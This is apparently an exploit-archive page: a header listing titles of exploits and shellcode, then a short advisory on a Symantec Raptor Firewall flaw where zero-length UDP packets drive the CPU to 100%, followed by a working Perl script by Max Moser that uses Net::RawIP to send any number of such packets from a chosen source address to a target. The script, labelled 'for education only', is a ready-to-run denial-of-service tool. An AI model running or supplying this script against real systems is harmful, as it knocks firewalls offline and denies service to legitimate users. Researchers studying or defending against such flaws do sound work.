
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
62 lines
No EOL
2.1 KiB
Perl
Executable file
62 lines
No EOL
2.1 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/3509/info
|
|
|
|
Raptor Firewall is a commercially available firewall implementation distributed by Symantec.
|
|
|
|
A problem with the handling of UDP packets by the firewall has been discovered. When the firewall receives zero length UDP packets, the machine hosting the firewall becomes processor bound, with the firewall taking 100% of the CPU.
|
|
|
|
This makes it possible for a remote user to crash the firewall, denying service to legitimate users of network resources. A reboot is required for the system to resume normal operation.
|
|
|
|
#!/usr/bin/perl
|
|
###################################
|
|
# This Code is for education only #
|
|
###################################
|
|
# Greetings to kitchen from #perl on irc openproject.net
|
|
# For the help on some perl questions.
|
|
# Firewalls are hard on the outside and crunchy on the inside
|
|
#
|
|
# The Rapor Firewall UDP-GSP (UDP-Proxy) gets 100% CPU load
|
|
# When getting UDP-Packets with no Data init
|
|
#
|
|
# Written 21.Jun 2001 by Max Moser mmo@remote-exploit.org
|
|
#
|
|
# http://www.remote-exploit.org
|
|
#
|
|
|
|
use Net::RawIP;
|
|
use Getopt::Long;
|
|
|
|
GetOptions('src=s','dst=s','num=i');
|
|
|
|
if (!$opt_src | !$opt_dst | !$opt_num ){
|
|
print "\nUsage parameters for ".$0.":\n";
|
|
print "\t--src\t IP-Sourceaddress\n";
|
|
print "\t--dst\t IP-Destinationaddress\n";
|
|
print "\t--num\t Numer of UDP packets to send\n";
|
|
print "\nExample:\n";
|
|
print "\t".$0." --src=192.168.0.1 --dst=192.168.0.354 --num=1000\n\n\n";
|
|
exit(1);
|
|
};
|
|
|
|
# Some defines
|
|
$| = 1;
|
|
@anim= ("\\","|","/","-","\\","|","/","-");
|
|
$source=$opt_src;
|
|
$destination=$opt_dst;
|
|
$numpack=$opt_num;
|
|
|
|
print "\n\n\tSending packets now ";
|
|
for($x=0;$x<$numpack;$x=$x+1){
|
|
my $sport=(rand(65534)+1);
|
|
my $dport=(rand(1024)+1);
|
|
my $c=new Net::RawIP({udp=>{source=>$sport,dest=>$dport}});
|
|
$c->set({ip=>{saddr=>$source,daddr=>$destination},{udp}});
|
|
$c->send;
|
|
undef $c;
|
|
for ($y=0;$y<8;$y=$y+1){
|
|
print "\b" . $anim[$y];
|
|
select (undef,undef,undef,0.01);
|
|
if ($y==8){ $y=0};
|
|
};
|
|
};
|
|
|
|
print "\n\n\nSuccessfully sent ".$numpack." packets to ". $destination . "\n\n"; |